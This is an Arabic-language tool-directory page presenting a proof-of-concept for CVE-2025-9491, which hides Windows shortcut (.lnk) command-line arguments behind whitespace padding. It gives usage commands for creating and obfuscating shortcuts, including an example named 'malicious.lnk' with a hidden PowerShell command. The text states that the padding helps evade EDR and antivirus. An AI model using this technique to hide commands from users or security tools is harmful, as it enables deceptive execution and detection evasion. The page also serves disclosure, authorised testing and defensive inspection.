Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-9491_POC — إثبات المفهوم لـ CVE-2025-9491 باستخدام أحرف غير مرئية في وسائط ملف اختصار ويندوز (.lnk) | Kitploit
أدوات/GitHubGitHub/amperclock/cve-2025-9491_poc
الاستغلالاختبار الاختراقتحليل الملفات الثنائيةالتعلم والتعليمالفريق الأحمرتطوير الحمولات
GitHubamperclock/cve-2025-9491_poc

CVE-2025-9491_POC

إثبات المفهوم لـ CVE-2025-9491 باستخدام أحرف غير مرئية في وسائط ملف اختصار ويندوز (.lnk)

عرض المستودع
184منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-9491 LNK Obfuscation PoC

أداة إثبات مفهوم لاستغلال ثغرة الاختصارات (LNK) في ويندوز (ZDI-CAN-25373/CVE-2025-9491). تُظهر هذه الأداة كيف يمكن إخفاء وسائط سطر الأوامر الخبيثة داخل ملفات .lnk باستخدام حشو بمسافات بيضاء.

**هذه الأداة مقدمة لأغراض تعليمية واختبارات أمنية مصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.


جدول المحتويات

  • الوصف
  • تفاصيل الثغرة
  • التثبيت
  • الاستخدام
    • وضع الإنشاء
    • وضع التعتيم
    • وضع التحليل
  • الإسناد

الوصف

هذه أداة إثبات مفهوم لإنشاء ومعالجة ملفات .lnk (اختصارات) في ويندوز لعرض الثغرة CVE-2025-9491. تتيح الأداة للمستخدمين:

  1. إنشاء ملفات LNK جديدة معتّمة من الصفر
  2. تعتيم ملفات LNK موجودة بإضافة حشو إلى وسائطها
  3. تحليل ملفات LNK لفحص محتوياتها

تستغل الثغرة كيفية عرض ويندوز لخصائص ملفات الاختصار، مما يسمح للمهاجمين بإخفاء وسائط سطر الأوامر الخبيثة عن المستخدمين الذين يفحصون الاختصار.


تفاصيل الثغرة

CVE-2025-9491 هي ثغرة في تمثيل واجهة المستخدم في ويندوز تؤثر على ملفات .lnk (الاختصارات). تم اكتشافها بواسطة مبادرة Zero Day Initiative التابعة لـ Trend Micro (ZDI-CAN-25373) وقد تم استغلالها من قبل مجموعات APT مدعومة من دول منذ عام 2017 على الأقل (راجع الإسناد للحصول على تفاصيل إضافية).

تستغل الثغرة الحقل "الهدف" ذو الحجم الثابت في واجهة مستخدم الاختصارات في ويندوز. عن طريق حشو الوسائط بأحرف مسافات بيضاء (مسافة، تاب، سطر جديد، رجوع عربة)، يمكن للجهات الخبيثة: إخفاء الأوامر الخبيثة وتنفيذ حمولات مخفية. يمكن استخدام هذا أيضًا لتجنب الكشف، حيث يرى المستخدمون الذين يفحصون الاختصار فقط المسافات البيضاء المحشوة، وليس الأمر الفعلي، وستحصل أنظمة EDR على سطر أوامر طويل جدًا في بيانات التتبع، وإذا كان طويلًا بما يكفي، ستتخلى أنظمة EPP أو AV الشائعة عن قراءته بالكامل.


التثبيت

يتطلب Python 3.7 أو أعلى.

  1. استنساخ أو تنزيل المستودع:

    root@kitploit:~
    git clone https://github.com/amperlcock/CVE-2025-9491_POC.git
    cd CVE-2025-9491_POC
    
  2. تثبيت التبعيات:

    root@kitploit:~
    طريقة سريعة وغير نظيفة، يُفضل استخدام البيئة الافتراضية.
    pip install -r requirements.txt
    
  3. تشغيل الأداة:

    root@kitploit:~
    python main.py --help
    

الاستخدام

تحتوي الأداة على ثلاثة أوضاع رئيسية: create و obfuscate و parse.

وضع الإنشاء

إنشاء ملف LNK جديد معتّم من الصفر.

الصيغة:

root@kitploit:~
python main.py create -t TARGET -a ARGUMENTS -o OUTPUT [options]

الوسائط الإلزامية:

  • -t, --target - مسار الملف التنفيذي الهدف
  • -a, --arguments - الوسائط التي يجب تمريرها إلى الملف التنفيذي الهدف
  • -o, --output - وجهة ملف LNK الناتج

الوسائط الاختيارية:

  • -c, --charset - مجموعة أحرف مخصصة للحشو (بصيغة HEX)

    • الافتراضي: 20,09,0A,0B,0C,0D (مسافة، تاب، LF، VT، FF، CR)
    • الصيغة: قيم HEX مفصولة بفواصل (بدون بادئة 0x)
  • -s, --padding_size - عدد أحرف الحشو

    • الافتراضي: 128 (لا يوجد حد معروف)
    • النوع: عدد صحيح
  • -p, --pattern_type - نمط الحشو

    • 1 (افتراضي): نمط عشوائي - يستخدم اختيارًا عشوائيًا من مجموعة الأحرف
    • 2: نمط أحادي - يكرر العنصر الأول من مجموعة الأحرف
    • 3: نمط دوري - يتنقل عبر عناصر مجموعة الأحرف بشكل دوري
  • -i, --icon - مسار أيقونة مخصصة للاختصار

    • الافتراضي: لا شيء (يستخدم الأيقونة الافتراضية)
  • -d, --description - وصف مرئي للاختصار

    • الافتراضي: لا شيء
  • -v, --verbose - تفعيل الإخراج المفصل

    • الافتراضي: معطل

مثال:

root@kitploit:~
python main.py create -t C:\Windows\System32\cmd.exe -a "/c whoami" -o output.lnk -s 256 -v

وضع التعتيم

إضافة حشو إلى وسائط ملف LNK موجود.

الصيغة:

root@kitploit:~
python main.py obfuscate -i INPUT -o OUTPUT [options]

الوسائط الإلزامية:

  • -i, --input - مسار ملف LNK الموجود لتعتيمه
  • -o, --output - وجهة ملف LNK الناتج

الوسائط الاختيارية:

  • -c, --charset - مجموعة أحرف مخصصة للحشو (بصيغة HEX)

    • الافتراضي: 20,09,0A,0B,0C,0D
    • الصيغة: قيم HEX مفصولة بفواصل
  • -s, --padding_size - عدد أحرف الحشو

    • الافتراضي: 128
    • النوع: عدد صحيح
  • -p, --pattern_type - نمط الحشو

    • 1 (افتراضي): نمط عشوائي
    • 2: نمط أحادي
    • 3: نمط دوري
  • -v, --verbose - تفعيل الإخراج المفصل

    • يعرض تحميل الملف، توليد الحشو، وعمليات الحفظ

مثال:

root@kitploit:~
python main.py obfuscate -i benign.lnk -o obfuscated.lnk -s 256 -p 3 -v

وضع التحليل

عرض محتويات ملف LNK موجود.

الصيغة:

root@kitploit:~
python main.py parse -i INPUT

الوسائط الإلزامية:

  • -i, --input - مسار ملف LNK لتحليله وعرضه

مثال:

root@kitploit:~
python main.py parse -i output.lnk

أمثلة

المثال 1: إنشاء اختصار بسيط معتّم

root@kitploit:~
python main.py create \
  -t "cmd.exe" \
  -a "/c powershell -Command Get-Process" \
  -o malicious.lnk \
  -s 200 \
  -p 1 \
  -v

ينشئ هذا اختصارًا إلى cmd.exe مع أمر PowerShell مخفي مسبوق بـ 200 حرف حشو عشوائي.

المثال 2: تعتيم اختصار موجود

root@kitploit:~
python main.py obfuscate \
  -i "legitimate.lnk" \
  -o "obfuscated.lnk" \
  -s 512 \
  -c "20,09,0A" \
  -p 2

يضيف هذا 512 حرفًا من الحشو الأحادي (باستخدام مسافة وتاب) إلى اختصار موجود.

المثال 3: فحص ملف LNK

root@kitploit:~
python main.py parse -i "suspicious.lnk"

يظهر الإخراج جميع الخصائص بما في ذلك الوسائط المخفية.

المثال 4: نمط مجموعة أحرف مخصص

root@kitploit:~
python main.py create \
  -t "powershell.exe" \
  -a "-NoProfile -ExecutionPolicy Bypass -Command 'Get-ChildItem'" \
  -o output.lnk \
  -c "20,09,0A,0B,0C,0D" \
  -s 1024 \
  -p 3 \
  -d "مستندي"

الإسناد

  • اكتشاف الثغرة: مبادرة Zero Day Initiative من Trend Micro ZDI-CAN-25373
  • مكتبة pylnk3: Strayge ومساهمون
  • مكتبة pylnk الأصلية: tim-erwin
تنزيل الأداة